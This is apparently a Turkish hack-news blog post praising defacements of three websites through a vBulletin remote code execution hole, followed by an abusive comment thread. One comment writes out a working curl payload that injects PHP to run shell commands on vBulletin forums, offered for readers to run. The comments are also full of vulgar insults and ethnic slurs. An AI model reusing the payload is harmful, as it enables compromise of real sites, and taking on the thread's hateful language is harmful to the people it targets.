Monzera kod adlı Türk hacker, ortaya karışık üç internet sitesine saldırı düzenledi.
Saldırıda dikkat çeken bir site var ki, Sahra demokratik arap devleti’nin forum sitesi geçtiğimiz günlerde ortaya çıkan vBulletin kaynaklı bir güvenlik açığından faydalandığını düşündüğümüz yöntem ile saldırılar gelmiş. Muhtemelen açık fixlendi ama güncellenme yapılmadığı sürece daha nice forum siteleri tehlike altında olduğunu varsayıyoruz.
Monzera tarafından yapılan siber saldırının kayıtları;
https://mirror-h.org/zone/2671209/
http://zone-h.org/mirror/id/34115591
Sahra Demokratik Arap Devleti En Büyük Forumu
http://zone-h.org/mirror/id/34116107
https://mirror-h.org/zone/2671234/
Jamai Ajans ve Magazin Sitesi
Lamer Haber, Hack Haber, Hack News, Hack Haberleri, Son Dakika Haberleri 
python vbulletin.py -l http://site.com/forum bu mu hack ?
BeğenBeğen
Sağlık, Demek istediğini gayet güzel bir nezih bir şekilde idrak ettim. Şöyle bir şey varki bu 0day 2019 yılında yayıldı script veya botu nacizane kullandığın ortada böyle bir yola gelemezsin zaten. Hack dediğimiz 0day’den ibaret değildir daha sql xss ve rcı çıkan bir sürü sistem var sanalda buda vbulletin gözden kaçırdığı bir rcı açığıdır bunun yayılmasın’dan itibaren bir çok firma bu zeroday ile hacklenerek firmalarını lekelediler sana şu kadar diyebilirim hacki bir scripte site koymakla sınıyorsan yorum yaparak zamanını heba etme script kullanmaya devam et etki insanlar bu yorumunu görüp öflemesinler sanalda hayla böyle insanlar kaldı mı diye neyse beni ilgilendirmez sana yayın hayatında başarılar dilerim gardeşim benim.
BeğenBeğen
amk lameri , pythonda post datayla gönderdiğin postu burpla gönderdin hackermi oldun , aptal. Otomatik shell atıp açığı fixleyen araç yazdım. Hala boş boş konuşuyor burada 😀
BeğenBeğen
Arkadaşlar 7/24 uyuyan bir insan değilim genelde sabahlıyorum. Tabi bu sırada kafam dolu oluyor + buraya yorum atıp açıklamada yapınca kafam gidiyor. Rcı açığı diye belirttiğim=Remote Code Evaluation zaten bir çok bilgi makale mevcut google aracılığı ile konu hakkında istediğiniz bilgiye erişebilirsiniz hayırlı günler herkese.
BeğenBeğen
Sağlık, az delikanlı olsan kendi nickinle yazarsın bende itimatı senden keserim kesin yakınım’dan birisin lamer falan demeler havalara girmeler. Ağzınız torba değilki büzelim. Neyse burda caz yapanlar. Maçı galibiyetle bitiremeyip boş yapanlar. Madem açığı fixlicek bir script yazabilme kabiliyetin var. Burda caz yapma hazır botlar kullanıp yola gelemeyip burda yok onu bunu yaptım diye geçinme. Bu arada sadece burp yok orda farkındaysan bir tarayıcıda mevcut anliyacağın senin seviyene inip bende küfür ederdim ama kusura bakma ben senin ve senin gibiler gibi ona buna caz yapıcak biri değilim.
BeğenBeğen
Sağlık, denilen lamerlikte master yapmış arkadaşımız gerçek nickini saklayarak yazıyor. Yok Python postuymuşta falan filanda bırak bu işleri pythonla alakası yok python ne alaka (; iyide sallıyorsun maşallağın var :d Aramızdaki farkları anlayıp sövmen hele beni dahada heveslendiriyor hacke. kendi yaptığı script varmış ahuahuauhuaha bana lamer diyen kişi python postunu burpa yansıttığımı belirtiyor (; neyse sen onun bunun scriptini sağiplen kardeşim benim. Nickinin olgunluğunu veremiyorsun yaşına bırakıyorum.
BeğenBeğen
amk beyinsizi , daha exploişt için yayınlanan PoC lardan haberi yok bash için curl ile çalışan bir PoC pythonla çalışan ayrı bir PoC yayınlandı ,
exploiti sana kim öğrettiyse git sor ona nerden aldığını , ezbere yapmayın oğlum her şeyi acık araştırın 😀
BeğenBeğen
Yav sağlık senin hayli haysiyetini skerim lan amın cocugu illa ağzımızı cümlemizimi bozalım aq veled-i zinası seni exploiti bana kimse öğretmedi hali hazır exploit poclar’dan bahsediyorsun 0dayin daha ne olduğunu bilmeyip ordan burdan kullandığın exploitleri gelip bana haber yapılan bir konuda yok zaten yayılmıştı ayagına girme senin ananı skerim tamam mı sabır ediyorum ediyorum en sonunda sövdürüyorsunuz amına kodumun lamerleri yapabileceğiniz tek şey boş boş yorum bu arada ezber yapan yok öğretenlerede senin gibi bir lamer’in sözüne itimat edip yazıcak değilim gülüm benim yaşımın yetmediği yerde aklım yeter senin sıfatını sikeyim ben amına kodumun lameri daha post yansıtmayı bilmeyip hayli hazırda exploit kullanan lamer seni sq köşene amın asosyali seni.
BeğenBeğen
büyük ihtimal ya z3r0fy ya da chain sensin ezbere diyip geçiniyorsun herkese bide sanalı piyasayı bıraktım diyordun yaz kendi kendine amına kodumun lameri bide beyinsiz diyor anasını minareye kaldırıp imam karısı yapıp ağzına şelale gibi akıttgımın cocuguna bak 😀 size lamerlikte destan yazmaya kolaylıklar dilerim az deliklanlı olunda gerçek nickinizle yazın.
BeğenBeğen
bu pocu al bacının mahkul bir yerine sokarsın sağlık z3r0mu desem chain mi desem
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d ‘subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
Ayrıca PoC dan falan bahsediyor amıcık.
html,python,bash,perl gibi programlara ait scriptleri internetten bulabilirsiniz bu amına koydugumun 0 Iq orospusuda burda karı gibi yazsın dursun. Yorumları okuyup exploiti çalıştırıcak arkadaşlar için manual pocu sundum size bu ortalık orospusu arkadaşa gelince. Ey ulu lamer orospu evladı aklın varsa sanal'dan siktirip gidersin gitmezsende her yerde ezilip ananın amına kavuşturulursun. tekrar hazır scriptlerle baş başa bırakıyorum seni. Türk Kürt kardeştir ama bu orospu evladı benim kardeşim değildir Kürt Orospu cocugu çok yazıyorda boş yazıyor cevabıda alır paşa paşa oturur yerinde umarım yoksa kafasına göre sikime kadar yolu var.
BeğenBeğen